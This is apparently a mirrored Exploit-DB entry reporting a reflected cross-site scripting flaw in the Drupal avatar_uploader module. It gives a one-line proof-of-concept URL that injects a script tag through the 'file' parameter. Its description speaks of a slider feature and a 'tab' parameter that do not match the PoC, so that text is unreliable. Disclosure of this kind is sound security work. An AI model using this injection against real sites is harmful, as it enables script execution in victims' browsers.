Drupal avatar_uploader v7.x-1.0-beta8 – Cross Site Scripting (XSS)

Exploit Database
90 阅读

作者： Milad karimi

日期： 2022-03-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50841/

# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
# Date: 2022-03-22
# Author: Milad karimi
# Software Link: https://www.drupal.org/project/avatar_uploader
# Version: v7.x-1.0-beta8
# Tested on: Windows 10
# CVE: N/A

1. Description:
This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script>

last Exploits
Drupal avatar_uploader v7.x-1.0-beta8 – Cross Site Scripting (XSS)的更多信息

Discuz! 6.0 – ‘uid’ Cross-Site Scripting：
S9Y Serendipity 1.6 – ‘Backend’ Cross-Site Scripting / SQL Injection：
Joomla! Component com_family – SQL Injection：
AneCMS 1.x – ‘/modules/blog/index.php’ HTML Injection：
Helmet Store Showroom v1.0 – SQL Injection：
Pligg CMS 1.0.4 – ‘search.php’ Cross-Site Scripting：
Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR – Local File Disclosure：
Smoothwall Express 3.1-SP4 – Cross-Site Scripting：